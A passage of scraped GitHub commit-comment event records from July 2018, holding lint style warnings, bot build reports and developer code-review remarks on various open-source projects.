*style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-09T18:38:05Z"}
{"id":"7939387116","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646077,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-09T18:38:07Z","updated_at":"2018-07-09T18:38:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:38:07Z"}
{"id":"7939388828","type":"CommitCommentEvent","actor":{"login":"JJMPdsk"},"repo":{"name":"JJMPdsk/NumberGuesser"},"payload":{"comment":{"id":29646079,"position":null,"line":null,"path":null,"commit_id":"b2acbf8df35debb761f21440d4e9162b0f456b14","created_at":"2018-07-09T18:38:25Z","updated_at":"2018-07-09T18:38:25Z","author_association":"OWNER","body":"*seem"}},"created_at":"2018-07-09T18:38:25Z"}
{"id":"7939389115","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646080,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-09T18:38:29Z","updated_at":"2018-07-09T18:38:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:38:29Z"}
{"id":"7939390105","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646083,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-09T18:38:43Z","updated_at":"2018-07-09T18:38:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:38:43Z"}
{"id":"7939390656","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646086,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-09T18:38:49Z","updated_at":"2018-07-09T18:38:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:38:49Z"}
{"id":"7939390796","type":"CommitCommentEvent","actor":{"login":"sludtke42"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29646087,"position":null,"line":null,"path":null,"commit_id":"c33766f2fc94189f66eb9a8287a5e0ea2ea35786","created_at":"2018-07-09T18:38:51Z","updated_at":"2018-07-09T18:38:51Z","author_association":"MEMBER","body":"I don't think I understand what is being inverted here. Can you give a before/after example?\n\n--------------------------------------------------------------------------------------\nSteven Ludtke, Ph.D. <sludtke@bcm.edu <mailto:sludtke@bcm.edu>>                      Baylor College of Medicine \nCharles C. Bell Jr., Professor of Structural Biology\nDept. of Biochemistry and Molecular Biology                      (www.bcm.edu/biochem <http://www.bcm.edu/biochem>)\nAcademic Director, CryoEM Core                                        (cryoem.bcm.edu <http://cryoem.bcm.edu/>)\nCo-Director CIBR Center                                    (www.bcm.edu/research/cibr <http://www.bcm.edu/research/cibr>)\nCo-Director National Center For Macromolecular Imaging                  (ncmi.bcm.edu <http://ncmi.bcm.edu/>)\n\n\n\n> On Jul 9, 2018, at 1:04 PM, James Michael Bell <notifications@github.com> wrote:\n> \n> I figured that path names based on the set names would help keep cell tomography projects organized; however, flipping the file names around isn't necessary. It just makes the project directory look a lot more organized. What do you think this will break? I'm happy to revert the commit if necessary.\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub <https://github.com/cryoem/eman2/commit/c33766f2fc94189f66eb9a8287a5e0ea2ea35786#commitcomment-29645591>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AJ6i6lakPPqYiYI5MhTd352CxjFKaqJrks5uE5s0gaJpZM4VII74>.\n> \n\n"}},"created_at":"2018-07-09T18:38:51Z"}
{"id":"7939390990","type":"CommitCommentEvent","actor":{"login":"rjbs"},"repo":{"name":"wolfsage/JMAP-TestSuite"},"payload":{"comment":{"id":29646088,"position":78,"line":112,"path":"lib/JMAP/TestSuite/JMAP/Tester/Wrapper.pm","commit_id":"0fa13441769b0dbcd13c444c1905f301896b6330","created_at":"2018-07-09T18:38:54Z","updated_at":"2018-07-09T18:38:54Z","author_association":"NONE","body":"I feel like all of this can probably simplified, but I don't have an immediate suggestion.  Stare at it for 5m and see if you see it?  If not, if nothing else comes up at the IETF hackathon, maybe I'll stare at it for 10m. :)"}},"created_at":"2018-07-09T18:38:54Z"}
{"id":"7939392848","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646092,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-09T18:39:18Z","updated_at":"2018-07-09T18:39:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:39:18Z"}
{"id":"7939393546","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29646095,"position":null,"line":null,"path":null,"commit_id":"92e2164fc908281d748d2728c911a81c28946147","created_at":"2018-07-09T18:39:26Z","updated_at":"2018-07-09T18:39:26Z","author_association":"CONTRIBUTOR","body":"@FRidh This update doesn't pass tests on Darwin:\r\n\r\n```\r\nbuilder for '/nix/store/b1lg03kmdjqafwsr9665439sf0w8rh8w-python2.7-tqdm-4.23.4.drv' failed with exit code 1; last 10 log lines:\r\n    File \"/private/tmp/nix-build-python2.7-tqdm-4.23.4.drv-0/tqdm-4.23.4/tqdm/tests/tests_synchronisation.py\", line 164, in test_monitoring_multi\r\n      assert t2.miniters == 500  # check that t2 was not adjusted\r\n  AssertionError\r\n\r\n  ----------------------------------------------------------------------\r\n  Ran 58 tests in 6.345s\r\n\r\n  FAILED (failures=1, skipped=9)\r\n  Test failed: <unittest.runner.TextTestResult run=58 errors=0 failures=1>\r\n  error: Test failed: <unittest.runner.TextTestResult run=58 errors=0 failures=1>\r\n[0 built (1 failed)]\r\n```"}},"created_at":"2018-07-09T18:39:26Z"}
{"id":"7939394713","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646099,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-09T18:39:41Z","updated_at":"2018-07-09T18:39:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:39:41Z"}
{"id":"7939396047","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646100,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-09T18:39:58Z","updated_at":"2018-07-09T18:39:58Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:39:58Z"}
{"id":"7939398557","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646107,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-09T18:40:28Z","updated_at":"2018-07-09T18:40:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:40:28Z"}
{"id":"7939400569","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646111,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-09T18:40:54Z","updated_at":"2018-07-09T18:40:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:40:54Z"}
{"id":"7939401559","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646113,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-09T18:41:07Z","updated_at":"2018-07-09T18:41:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:41:07Z"}
{"id":"7939402351","type":"CommitCommentEvent","actor":{"login":"jdurgin"},"repo":{"name":"ceph/ceph-ci"},"payload":{"comment":{"id":29646116,"position":29,"line":180,"path":"src/osd/PGLog.cc","commit_id":"afd9d18eff69068c27a3c23d07f4d77d5722ba29","created_at":"2018-07-09T18:41:16Z","updated_at":"2018-07-09T18:41:16Z","author_association":"MEMBER","body":"nit: should have {} around the else block too, especially when the if block has {} (too easy to accidentally add a line outside it by accident otherwise)"}},"created_at":"2018-07-09T18:41:16Z"}
{"id":"7939404276","type":"CommitCommentEvent","actor":{"login":"olegz"},"repo":{"name":"olegz/spring-cloud-stream"},"payload":{"comment":{"id":29646123,"position":null,"line":null,"path":null,"commit_id":"bf4dc73d26950dd2a573b32515b3e6ae6ef31801","created_at":"2018-07-09T18:41:40Z","updated_at":"2018-07-09T18:41:40Z","author_association":"OWNER","body":"Just as a general comment, the main problem was that this specific converter configuration was defined on the `EnableBinding` which is application related configuration and not the general infrastructure. The only reason why it does work for single binder scenarios is because of the parent/child setup which we don't do for multi-binder, hence the error. By moving it specifically as one of the binder's mandatory configuration ensures that it is always there regardless of single.multi binder scenarios."}},"created_at":"2018-07-09T18:41:40Z"}
{"id":"7939404288","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646124,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-09T18:41:40Z","updated_at":"2018-07-09T18:41:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:41:40Z"}
{"id":"7939406449","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646128,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-09T18:42:06Z","updated_at":"2018-07-09T18:42:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:42:06Z"}
{"id":"7939408431","type":"CommitCommentEvent","actor":{"login":"Rachine"},"repo":{"name":"bootphon/h5features"},"payload":{"comment":{"id":29646133,"position":13,"line":75,"path":"h5features/features.py","commit_id":"4b92d26249cb98d44dedac3a44dec0d43659b423","created_at":"2018-07-09T18:42:29Z","updated_at":"2018-07-09T18:42:29Z","author_association":"NONE","body":"Hello, why not uncomment the `try/ except IndexError condition`? \r\nI am facing the issue when I try to use 1D data with h5f (autocorrelation sequence) "}},"created_at":"2018-07-09T18:42:29Z"}
{"id":"7939412829","type":"CommitCommentEvent","actor":{"login":"g5v991x"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29646140,"position":null,"line":null,"path":null,"commit_id":"c33766f2fc94189f66eb9a8287a5e0ea2ea35786","created_at":"2018-07-09T18:43:23Z","updated_at":"2018-07-09T18:43:23Z","author_association":"CONTRIBUTOR","body":"from a tomogram called \"tomograms/tomo1__bin4.hdf\" extract particles with tag \"ribosome\"\r\nbefore the particles will be called \"particles3d/tomo1__ribosome.hdf\" now it is \"particles3d/ribosome__tomo1.hdf\". \r\nThe argument is this won't link to the same json file in info directory and some programs may fail to find ctf and tilt information.."}},"created_at":"2018-07-09T18:43:23Z"}
{"id":"7939413272","type":"CommitCommentEvent","actor":{"login":"rbri"},"repo":{"name":"mozilla/rhino"},"payload":{"comment":{"id":29646141,"position":null,"line":null,"path":null,"commit_id":"47a2c3ac047502b12744e495b1cdf2d6bc0392b8","created_at":"2018-07-09T18:43:28Z","updated_at":"2018-07-09T18:43:28Z","author_association":"CONTRIBUTOR","body":"Please close #297."}},"created_at":"2018-07-09T18:43:28Z"}
{"id":"7939413281","type":"CommitCommentEvent","actor":{"login":"Xottab-DUTY"},"repo":{"name":"q4a/xray-16"},"payload":{"comment":{"id":29646142,"position":15,"line":31,"path":"src/editors/xrEditor/entry_point.cpp","commit_id":"d0e39c8d03c664c7259cd68e85a73e33e26ba3b0","created_at":"2018-07-09T18:43:28Z","updated_at":"2018-07-09T18:43:28Z","author_association":"COLLABORATOR","body":"You forgot m_hWnd here"}},"created_at":"2018-07-09T18:43:28Z"}
{"id":"7939414647","type":"CommitCommentEvent","actor":{"login":"nicotravassos"},"repo":{"name":"EduardoPires/EquinoxProject"},"payload":{"comment":{"id":29646145,"position":null,"line":null,"path":null,"commit_id":"019e4c13568116500c8335f17d1b157ab499c797","created_at":"2018-07-09T18:43:45Z","updated_at":"2018-07-09T18:43:45Z","author_association":"NONE","body":"@EduardoPires Have you done any more work on v2 that you can publish for us?"}},"created_at":"2018-07-09T18:43:45Z"}
{"id":"7939419549","type":"CommitCommentEvent","actor":{"login":"karoka"},"repo":{"name":"karoka/Phys514_HW2"},"payload":{"comment":{"id":29646156,"position":null,"line":null,"path":null,"commit_id":"0140be2c97d9fe07f1eeafe8380dfe5dc7c97e5c","created_at":"2018-07-09T18:44:45Z","updated_at":"2018-07-09T18:44:45Z","author_association":"OWNER","body":"@ikzk 比如说follow jliu？"}},"created_at":"2018-07-09T18:44:45Z"}
{"id":"7939422271","type":"CommitCommentEvent","actor":{"login":"loumalouomega"},"repo":{"name":"KratosMultiphysics/Kratos"},"payload":{"comment":{"id":29646164,"position":92,"line":92,"path":"kratos/utilities/merge_variable_lists_utility.h","commit_id":"88230c839327d90bff73f4df98114825c315ce01","created_at":"2018-07-09T18:45:18Z","updated_at":"2018-07-09T18:45:18Z","author_association":"MEMBER","body":"KRATOS_INFO"}},"created_at":"2018-07-09T18:45:18Z"}
{"id":"7939422284","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29646165,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-09T18:45:18Z","updated_at":"2018-07-09T18:45:18Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2971 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T18:45:18Z"}
{"id":"7939425148","type":"CommitCommentEvent","actor":{"login":"sludtke42"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29646168,"position":null,"line":null,"path":null,"commit_id":"c33766f2fc94189f66eb9a8287a5e0ea2ea35786","created_at":"2018-07-09T18:45:50Z","updated_at":"2018-07-09T18:45:50Z","author_association":"MEMBER","body":"Changes to file naming which will impact what base_name() returns may easily cause problems and should be done very cautiously...\n\n--------------------------------------------------------------------------------------\nSteven Ludtke, Ph.D. <sludtke@bcm.edu <mailto:sludtke@bcm.edu>>                      Baylor College of Medicine \nCharles C. Bell Jr., Professor of Structural Biology\nDept. of Biochemistry and Molecular Biology                      (www.bcm.edu/biochem <http://www.bcm.edu/biochem>)\nAcademic Director, CryoEM Core                                        (cryoem.bcm.edu <http://cryoem.bcm.edu/>)\nCo-Director CIBR Center                                    (www.bcm.edu/research/cibr <http://www.bcm.edu/research/cibr>)\nCo-Director National Center For Macromolecular Imaging                  (ncmi.bcm.edu <http://ncmi.bcm.edu/>)\n\n\n\n> On Jul 9, 2018, at 1:43 PM, g5v991x <notifications@github.com> wrote:\n> \n> from a tomogram called \"tomograms/tomo1__bin4.hdf\" extract particles with tag \"ribosome\"\n> before the particles will be called \"particles3d/tomo1__ribosome.hdf\" now it is \"particles3d/ribosome__tomo1.hdf\".\n> The argument is this won't link to the same json file in info directory and some programs may fail to find ctf and tilt information..\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/cryoem/eman2/commit/c33766f2fc94189f66eb9a8287a5e0ea2ea35786#commitcomment-29646140>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AJ6i6gshky4AWAprHM8Af5qQ4sJuJTaTks5uE6RMgaJpZM4VII74>.\n> \n\n"}},"created_at":"2018-07-09T18:45:50Z"}
{"id":"7939425101","type":"CommitCommentEvent","actor":{"login":"loumalouomega"},"repo":{"name":"KratosMultiphysics/Kratos"},"payload":{"comment":{"id":29646169,"position":54,"line":54,"path":"kratos/utilities/merge_variable_lists_utility.h","commit_id":"88230c839327d90bff73f4df98114825c315ce01","created_at":"2018-07-09T18:45:51Z","updated_at":"2018-07-09T18:45:51Z","author_association":"MEMBER","body":"Template"}},"created_at":"2018-07-09T18:45:51Z"}
{"id":"7939425796","type":"CommitCommentEvent","actor":{"login":"loumalouomega"},"repo":{"name":"KratosMultiphysics/Kratos"},"payload":{"comment":{"id":29646170,"position":32,"line":32,"path":"kratos/utilities/merge_variable_lists_utility.h","commit_id":"88230c839327d90bff73f4df98114825c315ce01","created_at":"2018-07-09T18:45:59Z","updated_at":"2018-07-09T18:45:59Z","author_association":"MEMBER","body":"Template"}},"created_at":"2018-07-09T18:45:59Z"}
{"id":"7939430501","type":"CommitCommentEvent","actor":{"login":"Kinsiu00"},"repo":{"name":"Kinsiu00/selfNote_backend"},"payload":{"comment":{"id":29646180,"position":1,"line":1,"path":"sendgrid.env","commit_id":"ed1e2f0fef11412c811f0dfb6c5e86cc1ed66c42","created_at":"2018-07-09T18:46:56Z","updated_at":"2018-07-09T18:46:56Z","author_association":"OWNER","body":"Key is defunct."}},"created_at":"2018-07-09T18:46:56Z"}
